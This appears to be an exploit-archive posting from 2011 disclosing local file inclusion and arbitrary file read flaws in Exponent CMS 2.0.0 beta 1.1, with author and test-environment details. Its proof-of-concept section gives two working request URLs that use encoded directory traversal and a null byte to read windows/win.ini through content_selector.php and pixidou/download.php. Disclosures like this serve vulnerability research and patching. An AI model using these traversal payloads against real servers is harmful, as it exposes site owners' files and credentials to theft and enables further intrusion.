Home / exploits Exponent 2.0.0 Beta 1.1 Local File Inclusion
Posted on 09 May 2011
------------------------------------------------------------------------ Software................Exponent 2.0.0 beta 1.1 Vulnerability...........Local File Inclusion / Arbitrary Read Threat Level............Critical (4/5) Download................http://www.exponentcms.org/ Discovery Date..........5/4/2011 Tested On...............Windows Vista + XAMPP ------------------------------------------------------------------------ Author..................AutoSec Tools Site....................http://www.autosectools.com/ Email...................John Leitch <john@autosectools.com> ------------------------------------------------------------------------ --PoC-- Local File Inclusion: http://localhost/exponent/content_selector.php?controller=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00§ion=&action= Arbitrary Read: http://localhost/exponent/framework/modules/pixidou/download.php?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00
